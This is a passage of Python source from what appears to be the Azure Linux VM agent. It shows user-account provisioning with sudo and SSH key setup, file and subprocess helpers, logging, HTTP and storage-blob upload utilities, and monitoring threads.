expiration.split('.')[0] if Run(command): Error("Failed to create user account: " + user) return "Failed to create user account: " + user + " (0x07)." else: Log("CreateAccount: " + user + " already exists. Will update password.") if password != None: self.changePass(user, password) try: # for older distros create sudoers.d if not os.path.isdir(MyDistro.sudoers_dir_base + '/sudoers.d/'): # create the /etc/sudoers.d/ directory os.mkdir(MyDistro.sudoers_dir_base + '/sudoers.d') # add the include of sudoers.d to the /etc/sudoers SetFileContents(MyDistro.sudoers_dir_base + '/sudoers', GetFileContents( MyDistro.sudoers_dir_base + '/sudoers') + '\n#includedir ' + MyDistro.sudoers_dir_base + '/sudoers.d\n') if password == None: SetFileContents(MyDistro.sudoers_dir_base + "/sudoers.d/waagent", user + " ALL = (ALL) NOPASSWD: ALL\n") else: SetFileContents(MyDistro.sudoers_dir_base + "/sudoers.d/waagent", user + " ALL = (ALL) ALL\n") os.chmod(MyDistro.sudoers_dir_base + "/sudoers.d/waagent", 0o440) except: Error("CreateAccount: Failed to configure sudo access for user.") return "Failed to configure sudo privileges (0x08)." home = MyDistro.GetHome() if thumbprint != None: dir = home + "/" + user + "/.ssh" CreateDir(dir, user, 0o700) pub = dir + "/id_rsa.pub" prv = dir + "/id_rsa" Run("ssh-keygen -y -f " + thumbprint + ".prv > " + pub) SetFileContents(prv, GetFileContents(thumbprint + ".prv")) for f in [pub, prv]: os.chmod(f, 0o600) ChangeOwner(f, user) SetFileContents(dir + "/authorized_keys", GetFileContents(pub)) ChangeOwner(dir + "/authorized_keys", user) Log("Created user account: " + user) return None def DeleteAccount(self, user): """ Delete the 'user'. Clear utmp first, to avoid error. Removes the /etc/sudoers.d/waagent file. """ userentry = None try: userentry = pwd.getpwnam(user) except: pass if userentry == None: Error("DeleteAccount: " + user + " not found.") return uidmin = None try: if os.path.isfile("/etc/login.defs"): uidmin = int(GetLineStartingWith("UID_MIN", "/etc/login.defs").split()[1]) except: pass if uidmin == None: uidmin = 100 if userentry[2] < uidmin: Error("DeleteAccount: " + user + " is a system user. Will not delete account.") return Run("> /var/run/utmp") # Delete utmp to prevent error if we are the 'user' deleted pid = subprocess.Popen(['rmuser', '-y', user], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).pid try: os.remove(MyDistro.sudoers_dir_base + "/sudoers.d/waagent") except: pass return def ActivateResourceDiskNoThread(self): """ Format, mount, and if specified in the configuration set resource disk as swap. """ global DiskActivated Run('cp /usr/sbin/waagent /tmp/') SetFileContents('/tmp/bsd_activate_resource_disk.py', bsd_activate_resource_disk_txt) Run('chmod +x /tmp/bsd_activate_resource_disk.py') pid = subprocess.Popen(["/tmp/bsd_activate_resource_disk.py", ""]).pid Log("Spawning bsd_activate_resource_disk.py") DiskActivated = True return def Install(self): """ Install the agent service. Check dependencies. Create /etc/waagent.conf and move old version to /etc/waagent.conf.old Copy RulesFiles to /var/lib/waagent Create /etc/logrotate.d/waagent Set /etc/ssh/sshd_config ClientAliveInterval to 180 Call ApplyVNUMAWorkaround() """ if MyDistro.checkDependencies(): return 1 os.chmod(sys.argv[0], 0o755) SwitchCwd() for a in RulesFiles: if os.path.isfile(a): if os.path.isfile(GetLastPathElement(a)): os.remove(GetLastPathElement(a)) shutil.move(a, ".") Warn("Moved " + a + " -> " + LibDir + "/" + GetLastPathElement(a)) MyDistro.registerAgentService() if os.path.isfile("/etc/waagent.conf"): try: os.remove("/etc/waagent.conf.old") except: pass try: os.rename("/etc/waagent.conf", "/etc/waagent.conf.old") Warn("Existing /etc/waagent.conf has been renamed to /etc/waagent.conf.old") except: pass SetFileContents("/etc/waagent.conf", self.waagent_conf_file) if os.path.exists('/usr/local/etc/logrotate.d/'): SetFileContents("/usr/local/etc/logrotate.d/waagent", WaagentLogrotate) filepath = "/etc/ssh/sshd_config" ReplaceFileContentsAtomic(filepath, "\n".join(filter(lambda a: not a.startswith("ClientAliveInterval"), GetFileContents(filepath).split( '\n'))) + "\nClientAliveInterval 180\n") Log("Configured SSH client probing to keep connections alive.") # ApplyVNUMAWorkaround() return 0 def mediaHasFilesystem(self, dsk): if Run('LC_ALL=C fdisk -p ' + dsk + ' | grep "invalid fdisk partition table found" ', False): return False return True def mountDVD(self, dvd, location): # At this point we cannot read a joliet option udf DVD in freebsd10 - so we 'dd' it into our location retcode, out = RunGetOutput(self.mount_dvd_cmd + dvd + ' of=' + location + '/ovf-env.xml') if retcode != 0: return retcode, out ovfxml = (GetFileContents(location + "/ovf-env.xml", asbin=False)) if ord(ovfxml[0]) > 128 and ord(ovfxml[1]) > 128 and ord(ovfxml[2]) > 128: ovfxml = ovfxml[ 3:] # BOM is not stripped. First three bytes are > 128 and not unicode chars so we ignore them. ovfxml = ovfxml.strip(chr(0x00)) ovfxml = "".join(filter(lambda x: ord(x) < 128, ovfxml)) ovfxml = re.sub(r'</Environment>.*\Z', '', ovfxml, 0, re.DOTALL) ovfxml += '</Environment>' SetFileContents(location + "/ovf-env.xml", ovfxml) return retcode, out def GetHome(self): return '/home' def initScsiDiskTimeout(self): """ Set the SCSI disk timeout by updating the kernal config """ timeout = Config.get("OS.RootDeviceScsiTimeout") if timeout: Run("sysctl kern.cam.da.default_timeout=" + timeout) def setScsiDiskTimeout(self): return def setBlockDeviceTimeout(self, device, timeout): return def getProcessorCores(self): return int(RunGetOutput("sysctl hw.ncpu | awk '{print $2}'")[1]) def getTotalMemory(self): return int(RunGetOutput("sysctl hw.realmem | awk '{print $2}'")[1]) / 1024 def setDefaultGateway(self, gateway): Run("/sbin/route add default " + gateway, chk_err=False) def routeAdd(self, net, mask, gateway): Run("/sbin/route add -net " + net + " " + mask + " " + gateway, chk_err=False) ############################################################ # END DISTRO CLASS DEFS ############################################################ # This lets us index into a string or an array of integers transparently. def Ord(a): """ Allows indexing into a string or an array of integers transparently. Generic utility function. """ if type(a) == type("a"): a = ord(a) return a def IsLinux(): """ Returns True if platform is Linux. Generic utility function. """ return (platform.uname()[0] == "Linux") def GetLastPathElement(path): """ Similar to basename. Generic utility function. """ return path.rsplit('/', 1)[1] def GetFileContents(filepath, asbin=False): """ Read and return contents of 'filepath'. """ mode = 'r' if asbin: mode += 'b' c = None try: with open(filepath, mode) as F: c = F.read() except IOError as e: ErrorWithPrefix('GetFileContents', 'Reading from file ' + filepath + ' Exception is ' + str(e)) return None return c def SetFileContents(filepath, contents): """ Write 'contents' to 'filepath'. """ if type(contents) == str: contents = contents.encode('latin-1', 'ignore') try: with open(filepath, "wb+") as F: F.write(contents) except IOError as e: ErrorWithPrefix('SetFileContents', 'Writing to file ' + filepath + ' Exception is ' + str(e)) return None return 0 def AppendFileContents(filepath, contents): """ Append 'contents' to 'filepath'. """ if type(contents) == str: contents = contents.encode('latin-1') try: with open(filepath, "a+") as F: F.write(contents) except IOError as e: ErrorWithPrefix('AppendFileContents', 'Appending to file ' + filepath + ' Exception is ' + str(e)) return None return 0 def ReplaceFileContentsAtomic(filepath, contents): """ Write 'contents' to 'filepath' by creating a temp file, and replacing original. """ handle, temp = tempfile.mkstemp(dir=os.path.dirname(filepath)) if type(contents) == str: contents = contents.encode('latin-1') try: os.write(handle, contents) except IOError as e: ErrorWithPrefix('ReplaceFileContentsAtomic', 'Writing to file ' + filepath + ' Exception is ' + str(e)) return None finally: os.close(handle) try: os.rename(temp, filepath) return None except IOError as e: ErrorWithPrefix('ReplaceFileContentsAtomic', 'Renaming ' + temp + ' to ' + filepath + ' Exception is ' + str(e)) try: os.remove(filepath) except IOError as e: ErrorWithPrefix('ReplaceFileContentsAtomic', 'Removing ' + filepath + ' Exception is ' + str(e)) try: os.rename(temp, filepath) except IOError as e: ErrorWithPrefix('ReplaceFileContentsAtomic', 'Removing ' + filepath + ' Exception is ' + str(e)) return 1 return 0 def GetLineStartingWith(prefix, filepath): """ Return line from 'filepath' if the line startswith 'prefix' """ for line in GetFileContents(filepath).split('\n'): if line.startswith(prefix): return line return None def Run(cmd, chk_err=True): """ Calls RunGetOutput on 'cmd', returning only the return code. If chk_err=True then errors will be reported in the log. If chk_err=False then errors will be suppressed from the log. """ retcode, out = RunGetOutput(cmd, chk_err) return retcode def RunGetOutput(cmd, chk_err=True, log_cmd=True): """ Wrapper for subprocess.check_output. Execute 'cmd'. Returns return code and STDOUT, trapping expected exceptions. Reports exceptions to Error if chk_err parameter is True """ if log_cmd: LogIfVerbose(cmd) try: output = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True) except subprocess.CalledProcessError as e: if chk_err and log_cmd: Error('CalledProcessError. Error Code is ' + str(e.returncode)) Error('CalledProcessError. Command string was ' + e.cmd) Error('CalledProcessError. Command result was ' + (e.output[:-1]).decode('latin-1')) return e.returncode, e.output.decode('latin-1') return 0, output.decode('latin-1') def RunSendStdin(cmd, input, chk_err=True, log_cmd=True): """ Wrapper for subprocess.Popen. Execute 'cmd', sending 'input' to STDIN of 'cmd'. Returns return code and STDOUT, trapping expected exceptions. Reports exceptions to Error if chk_err parameter is True """ if log_cmd: LogIfVerbose(cmd + input) try: me = subprocess.Popen([cmd], shell=True, stdin=subprocess.PIPE, stderr=subprocess.STDOUT, stdout=subprocess.PIPE) output = me.communicate(input) except OSError as e: if chk_err and log_cmd: Error('CalledProcessError. Error Code is ' + str(me.returncode)) Error('CalledProcessError. Command string was ' + cmd) Error('CalledProcessError. Command result was ' + output[0].decode('latin-1')) return 1, output[0].decode('latin-1') if me.returncode is not 0 and chk_err is True and log_cmd: Error('CalledProcessError. Error Code is ' + str(me.returncode)) Error('CalledProcessError. Command string was ' + cmd) Error('CalledProcessError. Command result was ' + output[0].decode('latin-1')) return me.returncode, output[0].decode('latin-1') def GetNodeTextData(a): """ Filter non-text nodes from DOM tree """ for b in a.childNodes: if b.nodeType == b.TEXT_NODE: return b.data def GetHome(): """ Attempt to guess the $HOME location. Return the path string. """ home = None try: home = GetLineStartingWith("HOME", "/etc/default/useradd").split('=')[1].strip() except: pass if (home == None) or (home.startswith("/") == False): home = "/home" return home def ChangeOwner(filepath, user): """ Lookup user. Attempt chown 'filepath' to 'user'. """ p = None try: p = pwd.getpwnam(user) except: pass if p != None: if not os.path.exists(filepath): Error("Path does not exist: {0}".format(filepath)) else: os.chown(filepath, p[2], p[3]) def CreateDir(dirpath, user, mode): """ Attempt os.makedirs, catch all exceptions. Call ChangeOwner afterwards. """ try: os.makedirs(dirpath, mode) except: pass ChangeOwner(dirpath, user) def CreateAccount(user, password, expiration, thumbprint): """ Create a user account, with 'user', 'password', 'expiration', ssh keys and sudo permissions. Returns None if successful, error string on failure. """ userentry = None try: userentry = pwd.getpwnam(user) except: pass uidmin = None try: uidmin = int(GetLineStartingWith("UID_MIN", "/etc/login.defs").split()[1]) except: pass if uidmin == None: uidmin = 100 if userentry != None and userentry[2] < uidmin: Error("CreateAccount: " + user + " is a system user. Will not set password.") return "Failed to set password for system user: " + user + " (0x06)." if userentry == None: command = "useradd -m " + user if expiration != None: command += " -e " + expiration.split('.')[0] if Run(command): Error("Failed to create user account: " + user) return "Failed to create user account: " + user + " (0x07)." else: Log("CreateAccount: " + user + " already exists. Will update password.") if password != None: MyDistro.changePass(user, password) try: # for older distros create sudoers.d if not os.path.isdir('/etc/sudoers.d/'): # create the /etc/sudoers.d/ directory os.mkdir('/etc/sudoers.d/') # add the include of sudoers.d to the /etc/sudoers SetFileContents('/etc/sudoers', GetFileContents('/etc/sudoers') + '\n#includedir /etc/sudoers.d\n') if password == None: SetFileContents("/etc/sudoers.d/waagent", user + " ALL = (ALL) NOPASSWD: ALL\n") else: SetFileContents("/etc/sudoers.d/waagent", user + " ALL = (ALL) ALL\n") os.chmod("/etc/sudoers.d/waagent", 0o440) except: Error("CreateAccount: Failed to configure sudo access for user.") return "Failed to configure sudo privileges (0x08)." home = MyDistro.GetHome() if thumbprint != None: dir = home + "/" + user + "/.ssh" CreateDir(dir, user, 0o700) pub = dir + "/id_rsa.pub" prv = dir + "/id_rsa" Run("ssh-keygen -y -f " + thumbprint + ".prv > " + pub) SetFileContents(prv, GetFileContents(thumbprint + ".prv")) for f in [pub, prv]: os.chmod(f, 0o600) ChangeOwner(f, user) SetFileContents(dir + "/authorized_keys", GetFileContents(pub)) ChangeOwner(dir + "/authorized_keys", user) Log("Created user account: " + user) return None def DeleteAccount(user): """ Delete the 'user'. Clear utmp first, to avoid error. Removes the /etc/sudoers.d/waagent file. """ userentry = None try: userentry = pwd.getpwnam(user) except: pass if userentry == None: Error("DeleteAccount: " + user + " not found.") return uidmin = None try: uidmin = int(GetLineStartingWith("UID_MIN", "/etc/login.defs").split()[1]) except: pass if uidmin == None: uidmin = 100 if userentry[2] < uidmin: Error("DeleteAccount: " + user + " is a system user. Will not delete account.") return Run("> /var/run/utmp") # Delete utmp to prevent error if we are the 'user' deleted Run("userdel -f -r " + user) try: os.remove("/etc/sudoers.d/waagent") except: pass return def IsInRangeInclusive(a, low, high): """ Return True if 'a' in 'low' <= a >= 'high' """ return (a >= low and a <= high) def IsPrintable(ch): """ Return True if character is displayable. """ return IsInRangeInclusive(ch, Ord('A'), Ord('Z')) or IsInRangeInclusive(ch, Ord('a'), Ord('z')) or IsInRangeInclusive(ch, Ord('0'), Ord('9')) def HexDump(buffer, size): """ Return Hex formated dump of a 'buffer' of 'size'. """ if size < 0: size = len(buffer) result = "" for i in range(0, size): if (i % 16) == 0: result += "%06X: " % i byte = buffer[i] if type(byte) == str: byte = ord(byte.decode('latin1')) result += "%02X " % byte if (i & 15) == 7: result += " " if ((i + 1) % 16) == 0 or (i + 1) == size: j = i while ((j + 1) % 16) != 0: result += " " if (j & 7) == 7: result += " " j += 1 result += " " for j in range(i - (i % 16), i + 1): byte = buffer[j] if type(byte) == str: byte = ord(byte.decode('latin1')) k = '.' if IsPrintable(byte): k = chr(byte) result += k if (i + 1) != size: result += "\n" return result def SimpleLog(file_path, message): if not file_path or len(message) < 1: return t = time.localtime() t = "%04u/%02u/%02u %02u:%02u:%02u " % (t.tm_year, t.tm_mon, t.tm_mday, t.tm_hour, t.tm_min, t.tm_sec) lines = re.sub(re.compile(r'^(.)', re.MULTILINE), t + r'\1', message) with open(file_path, "a") as F: lines = filter(lambda x: x in string.printable, lines) F.write(lines.encode('ascii', 'ignore') + "\n") class Logger(object): """ The Agent's logging assumptions are: For Log, and LogWithPrefix all messages are logged to the self.file_path and to the self.con_path. Setting either path parameter to None skips that log. If Verbose is enabled, messages calling the LogIfVerbose method will be logged to file_path yet not to con_path. Error and Warn messages are normal log messages with the 'ERROR:' or 'WARNING:' prefix added. """ def __init__(self, filepath, conpath, verbose=False): """ Construct an instance of Logger. """ self.file_path = filepath self.con_path = conpath self.verbose = verbose def ThrottleLog(self, counter): """ Log everything up to 10, every 10 up to 100, then every 100. """ return (counter < 10) or ((counter < 100) and ((counter % 10) == 0)) or ((counter % 100) == 0) def LogToFile(self, message): """ Write 'message' to logfile. """ if self.file_path: try: with open(self.file_path, "a") as F: message = filter(lambda x: x in string.printable, message) F.write(message.encode('ascii', 'ignore') + "\n") except IOError as e: ##print e pass def LogToCon(self, message): """ Write 'message' to /dev/console. This supports serial port logging if the /dev/console is redirected to ttys0 in kernel boot options. """ if self.con_path: try: with open(self.con_path, "w") as C: message = filter(lambda x: x in string.printable, message) C.write(message.encode('ascii', 'ignore') + "\n") except IOError as e: pass def Log(self, message): """ Standard Log function. Logs to self.file_path, and con_path """ self.LogWithPrefix("", message) def LogWithPrefix(self, prefix, message): """ Prefix each line of 'message' with current time+'prefix'. """ t = time.localtime() t = "%04u/%02u/%02u %02u:%02u:%02u " % (t.tm_year, t.tm_mon, t.tm_mday, t.tm_hour, t.tm_min, t.tm_sec) t += prefix for line in message.split('\n'): line = t + line self.LogToFile(line) self.LogToCon(line) def NoLog(self, message): """ Don't Log. """ pass def LogIfVerbose(self, message): """ Only log 'message' if global Verbose is True. """ self.LogWithPrefixIfVerbose('', message) def LogWithPrefixIfVerbose(self, prefix, message): """ Only log 'message' if global Verbose is True. Prefix each line of 'message' with current time+'prefix'. """ if self.verbose == True: t = time.localtime() t = "%04u/%02u/%02u %02u:%02u:%02u " % (t.tm_year, t.tm_mon, t.tm_mday, t.tm_hour, t.tm_min, t.tm_sec) t += prefix for line in message.split('\n'): line = t + line self.LogToFile(line) self.LogToCon(line) def Warn(self, message): """ Prepend the text "WARNING:" to the prefix for each line in 'message'. """ self.LogWithPrefix("WARNING:", message) def Error(self, message): """ Call ErrorWithPrefix(message). """ ErrorWithPrefix("", message) def ErrorWithPrefix(self, prefix, message): """ Prepend the text "ERROR:" to the prefix for each line in 'message'. Errors written to logfile, and /dev/console """ self.LogWithPrefix("ERROR:", message) def LoggerInit(log_file_path, log_con_path, verbose=False): """ Create log object and export its methods to global scope. """ global Log, LogWithPrefix, LogIfVerbose, LogWithPrefixIfVerbose, Error, ErrorWithPrefix, Warn, NoLog, ThrottleLog, myLogger l = Logger(log_file_path, log_con_path, verbose) Log, LogWithPrefix, LogIfVerbose, LogWithPrefixIfVerbose, Error, ErrorWithPrefix, Warn, NoLog, ThrottleLog, myLogger = l.Log, l.LogWithPrefix, l.LogIfVerbose, l.LogWithPrefixIfVerbose, l.Error, l.ErrorWithPrefix, l.Warn, l.NoLog, l.ThrottleLog, l class HttpResourceGoneError(Exception): pass class Util(object): """ Http communication class. Base of GoalState, and Agent classes. """ RetryWaitingInterval = 10 def __init__(self): self.Endpoint = None def _ParseUrl(self, url): secure = False host = self.Endpoint path = url port = None # "http[s]://hostname[:port][/]" if url.startswith("http://"): url = url[7:] if "/" in url: host = url[0: url.index("/")] path = url[url.index("/"):] else: host = url path = "/" elif url.startswith("https://"): secure = True url = url[8:] if "/" in url: host = url[0: url.index("/")] path = url[url.index("/"):] else: host = url path = "/" if host is None: raise ValueError("Host is invalid:{0}".format(url)) if (":" in host): pos = host.rfind(":") port = int(host[pos + 1:]) host = host[0:pos] return host, port, secure, path def GetHttpProxy(self, secure): """ Get http_proxy and https_proxy from environment variables. Username and password is not supported now. """ host = Config.get("HttpProxy.Host") port = Config.get("HttpProxy.Port") return (host, port) def _HttpRequest(self, method, host, path, port=None, data=None, secure=False, headers=None, proxyHost=None, proxyPort=None): resp = None conn = None try: if secure: port = 443 if port is None else port if proxyHost is not None and proxyPort is not None: conn = httplibs.HTTPSConnection(proxyHost, proxyPort, timeout=10) conn.set_tunnel(host, port) # If proxy is used, full url is needed. path = "https://{0}:{1}{2}".format(host, port, path) else: conn = httplibs.HTTPSConnection(host, port, timeout=10) else: port = 80 if port is None else port if proxyHost is not None and proxyPort is not None: conn = httplibs.HTTPConnection(proxyHost, proxyPort, timeout=10) # If proxy is used, full url is needed. path = "http://{0}:{1}{2}".format(host, port, path) else: conn = httplibs.HTTPConnection(host, port, timeout=10) if headers == None: conn.request(method, path, data) else: conn.request(method, path, data, headers) resp = conn.getresponse() except httplibs.HTTPException as e: Error('HTTPException {0}, args:{1}'.format(e, repr(e.args))) except IOError as e: Error('Socket IOError {0}, args:{1}'.format(e, repr(e.args))) return resp def HttpRequest(self, method, url, data=None, headers=None, maxRetry=3, chkProxy=False): """ Sending http request to server On error, sleep 10 and maxRetry times. Return the output buffer or None. """ LogIfVerbose("HTTP Req: {0} {1}".format(method, url)) LogIfVerbose("HTTP Req: Data={0}".format(data)) LogIfVerbose("HTTP Req: Header={0}".format(headers)) try: host, port, secure, path = self._ParseUrl(url) except ValueError as e: Error("Failed to parse url:{0}".format(url)) return None # Check proxy proxyHost, proxyPort = (None, None) if chkProxy: proxyHost, proxyPort = self.GetHttpProxy(secure) # If httplib module is not built with ssl support. Fallback to http if secure and not hasattr(httplibs, "HTTPSConnection"): Warn("httplib is not built with ssl support") secure = False proxyHost, proxyPort = self.GetHttpProxy(secure) # If httplib module doesn't support https tunnelling. Fallback to http if secure and \ proxyHost is not None and \ proxyPort is not None and \ not hasattr(httplibs.HTTPSConnection, "set_tunnel"): Warn("httplib doesn't support https tunnelling(new in python 2.7)") secure = False proxyHost, proxyPort = self.GetHttpProxy(secure) resp = self._HttpRequest(method, host, path, port=port, data=data, secure=secure, headers=headers, proxyHost=proxyHost, proxyPort=proxyPort) for retry in range(0, maxRetry): if resp is not None and \ (resp.status == httplibs.OK or \ resp.status == httplibs.CREATED or \ resp.status == httplibs.ACCEPTED): return resp; if resp is not None and resp.status == httplibs.GONE: raise HttpResourceGoneError("Http resource gone.") Error("Retry={0}".format(retry)) Error("HTTP Req: {0} {1}".format(method, url)) Error("HTTP Req: Data={0}".format(data)) Error("HTTP Req: Header={0}".format(headers)) if resp is None: Error("HTTP Err: response is empty.".format(retry)) else: Error("HTTP Err: Status={0}".format(resp.status)) Error("HTTP Err: Reason={0}".format(resp.reason)) Error("HTTP Err: Header={0}".format(resp.getheaders())) Error("HTTP Err: Body={0}".format(resp.read())) time.sleep(self.__class__.RetryWaitingInterval) resp = self._HttpRequest(method, host, path, port=port, data=data, secure=secure, headers=headers, proxyHost=proxyHost, proxyPort=proxyPort) return None def HttpGet(self, url, headers=None, maxRetry=3, chkProxy=False): return self.HttpRequest("GET", url, headers=headers, maxRetry=maxRetry, chkProxy=chkProxy) def HttpHead(self, url, headers=None, maxRetry=3, chkProxy=False): return self.HttpRequest("HEAD", url, headers=headers, maxRetry=maxRetry, chkProxy=chkProxy) def HttpPost(self, url, data, headers=None, maxRetry=3, chkProxy=False): return self.HttpRequest("POST", url, data=data, headers=headers, maxRetry=maxRetry, chkProxy=chkProxy) def HttpPut(self, url, data, headers=None, maxRetry=3, chkProxy=False): return self.HttpRequest("PUT", url, data=data, headers=headers, maxRetry=maxRetry, chkProxy=chkProxy) def HttpDelete(self, url, headers=None, maxRetry=3, chkProxy=False): return self.HttpRequest("DELETE", url, headers=headers, maxRetry=maxRetry, chkProxy=chkProxy) def HttpGetWithoutHeaders(self, url, maxRetry=3, chkProxy=False): """ Return data from an HTTP get on 'url'. """ resp = self.HttpGet(url, headers=None, maxRetry=maxRetry, chkProxy=chkProxy) return resp.read() if resp is not None else None def HttpGetWithHeaders(self, url, maxRetry=3, chkProxy=False): """ Return data from an HTTP get on 'url' with x-ms-agent-name and x-ms-version headers. """ resp = self.HttpGet(url, headers={ "x-ms-agent-name": GuestAgentName, "x-ms-version": ProtocolVersion }, maxRetry=maxRetry, chkProxy=chkProxy) return resp.read() if resp is not None else None def HttpSecureGetWithHeaders(self, url, transportCert, maxRetry=3, chkProxy=False): """ Return output of get using ssl cert. """ resp = self.HttpGet(url, headers={ "x-ms-agent-name": GuestAgentName, "x-ms-version": ProtocolVersion, "x-ms-cipher-name": "DES_EDE3_CBC", "x-ms-guest-agent-public-x509-cert": transportCert }, maxRetry=maxRetry, chkProxy=chkProxy) return resp.read() if resp is not None else None def HttpPostWithHeaders(self, url, data, maxRetry=3, chkProxy=False): headers = { "x-ms-agent-name": GuestAgentName, "Content-Type": "text/xml; charset=utf-8", "x-ms-version": ProtocolVersion } try: return self.HttpPost(url, data=data, headers=headers, maxRetry=maxRetry, chkProxy=chkProxy) except HttpResourceGoneError as e: Error("Failed to post: {0} {1}".format(url, e)) return None __StorageVersion = "2014-02-14" def GetBlobType(url): restutil = Util() # Check blob type LogIfVerbose("Check blob type.") timestamp = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()) blobPropResp = restutil.HttpHead(url, { "x-ms-date": timestamp, 'x-ms-version': __StorageVersion }, chkProxy=True); blobType = None if blobPropResp is None: Error("Can't get status blob type.") return None blobType = blobPropResp.getheader("x-ms-blob-type") LogIfVerbose("Blob type={0}".format(blobType)) return blobType def PutBlockBlob(url, data): restutil = Util() LogIfVerbose("Upload block blob") timestamp = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()) ret = restutil.HttpPut(url, data, { "x-ms-date": timestamp, "x-ms-blob-type": "BlockBlob", "Content-Length": str(len(data)), "x-ms-version": __StorageVersion }, chkProxy=True) if ret is None: Error("Failed to upload block blob for status.") return -1 return 0 def PutPageBlob(url, data): restutil = Util() LogIfVerbose("Replace old page blob") timestamp = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()) # Align to 512 bytes pageBlobSize = ((len(data) + 511) / 512) * 512 ret = restutil.HttpPut(url, "", { "x-ms-date": timestamp, "x-ms-blob-type": "PageBlob", "Content-Length": "0", "x-ms-blob-content-length": str(pageBlobSize), "x-ms-version": __StorageVersion }, chkProxy=True) if ret is None: Error("Failed to clean up page blob for status") return -1 if url.index('?') < 0: url = "{0}?comp=page".format(url) else: url = "{0}&comp=page".format(url) LogIfVerbose("Upload page blob") pageMax = 4 * 1024 * 1024 # Max page size: 4MB start = 0 end = 0 while end < len(data): end = min(len(data), start + pageMax) contentSize = end - start # Align to 512 bytes pageEnd = ((end + 511) / 512) * 512 bufSize = pageEnd - start buf = bytearray(bufSize) buf[0: contentSize] = data[start: end] if sys.version_info > (3,): buffer = memoryview ret = restutil.HttpPut(url, buffer(buf), { "x-ms-date": timestamp, "x-ms-range": "bytes={0}-{1}".format(start, pageEnd - 1), "x-ms-page-write": "update", "x-ms-version": __StorageVersion, "Content-Length": str(pageEnd - start) }, chkProxy=True) if ret is None: Error("Failed to upload page blob for status") return -1 start = end return 0 def UploadStatusBlob(url, data): LogIfVerbose("Upload status blob") LogIfVerbose("Status={0}".format(data)) blobType = GetBlobType(url) if blobType == "BlockBlob": return PutBlockBlob(url, data) elif blobType == "PageBlob": return PutPageBlob(url, data) else: Error("Unknown blob type: {0}".format(blobType)) return -1 class TCPHandler(SocketServers.BaseRequestHandler): """ Callback object for LoadBalancerProbeServer. Recv and send LB probe messages. """ def __init__(self, lb_probe): super(TCPHandler, self).__init__() self.lb_probe = lb_probe def GetHttpDateTimeNow(self): """ Return formatted gmtime "Date: Fri, 25 Mar 2011 04:53:10 GMT" """ return time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime()) def handle(self): """ Log LB probe messages, read the socket buffer, send LB probe response back to server. """ self.lb_probe.ProbeCounter = (self.lb_probe.ProbeCounter + 1) % 1000000 log = [NoLog, LogIfVerbose][ThrottleLog(self.lb_probe.ProbeCounter)] strCounter = str(self.lb_probe.ProbeCounter) if self.lb_probe.ProbeCounter == 1: Log("Receiving LB probes.") log("Received LB probe # " + strCounter) self.request.recv(1024) self.request.send( "HTTP/1.1 200 OK\r\nContent-Length: 2\r\nContent-Type: text/html\r\nDate: " + self.GetHttpDateTimeNow() + "\r\n\r\nOK") class LoadBalancerProbeServer(object): """ Threaded object to receive and send LB probe messages. Load Balancer messages but be recv'd by the load balancing server, or this node may be shut-down. """ def __init__(self, port): self.ProbeCounter = 0 self.server = SocketServers.TCPServer((self.get_ip(), port), TCPHandler) self.server_thread = threading.Thread(target=self.server.serve_forever) self.server_thread.setDaemon(True) self.server_thread.start() def shutdown(self): self.server.shutdown() def get_ip(self): for retry in range(1, 6): ip = MyDistro.GetIpv4Address() if ip == None: Log("LoadBalancerProbeServer: GetIpv4Address() returned None, sleeping 10 before retry " + str( retry + 1)) time.sleep(10) else: return ip class ConfigurationProvider(object): """ Parse amd store key:values in waagent.conf """ def __init__(self, walaConfigFile): self.values = dict() if 'MyDistro' not in globals(): global MyDistro MyDistro = GetMyDistro() if walaConfigFile is None: walaConfigFile = MyDistro.getConfigurationPath() if os.path.isfile(walaConfigFile) == False: raise Exception("Missing configuration in {0}".format(walaConfigFile)) try: for line in GetFileContents(walaConfigFile).split('\n'): if not line.startswith("#") and "=" in line: parts = line.split()[0].split('=') value = parts[1].strip("\" ") if value != "None": self.values[parts[0]] = value else: self.values[parts[0]] = None except: Error("Unable to parse {0}".format(walaConfigFile)) raise return def get(self, key): return self.values.get(key) class EnvMonitor(object): """ Montor changes to dhcp and hostname. If dhcp clinet process re-start has occurred, reset routes, dhcp with fabric. """ def __init__(self): self.shutdown = False self.HostName = socket.gethostname() self.server_thread = threading.Thread(target=self.monitor) self.server_thread.setDaemon(True) self.server_thread.start() self.published = False def monitor(self): """ Monitor dhcp client pid and hostname. If dhcp clinet process re-start has occurred, reset routes, dhcp with fabric. """ publish = Config.get("Provisioning.MonitorHostName") dhcpcmd = MyDistro.getpidcmd + ' ' + MyDistro.getDhcpClientName() dhcppid = RunGetOutput(dhcpcmd)[1] while not self.shutdown: for a in RulesFiles: if os.path.isfile(a): if os.path.isfile(GetLastPathElement(a)): os.remove(GetLastPathElement(a)) shutil.move(a, ".") Log("EnvMonitor: Moved " + a + " -> " + LibDir) MyDistro.setScsiDiskTimeout() if publish != None and publish.lower().startswith("y"): try: if socket.gethostname() != self.HostName: Log("EnvMonitor: Detected host name change: " + self.HostName + " -> " + socket.gethostname()) self.HostName = socket.gethostname() WaAgent.UpdateAndPublishHostName(self.HostName) dhcppid = RunGetOutput(dhcpcmd)[1] self.published = True except: pass else: self.published = True pid = "" if not os.path.isdir("/proc/" + dhcppid.strip()): pid = RunGetOutput(dhcpcmd)[1] if pid != "" and pid != dhcppid: Log("EnvMonitor: Detected dhcp client restart. Restoring routing table.") WaAgent.RestoreRoutes() dhcppid = pid for child in Children: if child.poll() != None: Children.remove(child) time.sleep(5) def SetHostName(self, name): """ Generic call to MyDistro.setHostname(name). Complian to Log on error. """ if socket.gethostname() == name: self.published = True elif MyDistro.setHostname(name): Error("Error: SetHostName: Cannot set hostname to " + name) return ("Error: SetHostName: Cannot set hostname to " + name) def IsHostnamePublished(self): """ Return self.published """ return self.published def ShutdownService(self): """ Stop server comminucation and join the thread to main thread. """ self.shutdown = True self.server_thread.join() class Certificates(object): """ Object containing certificates of host and provisioned user. Parses and splits certificates into files. """ # <CertificateFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="certificates10.xsd"> # <Version>2010-12-15</Version> # <Incarnation>2</Incarnation> # <Format>Pkcs7BlobWithPfxContents</Format> # 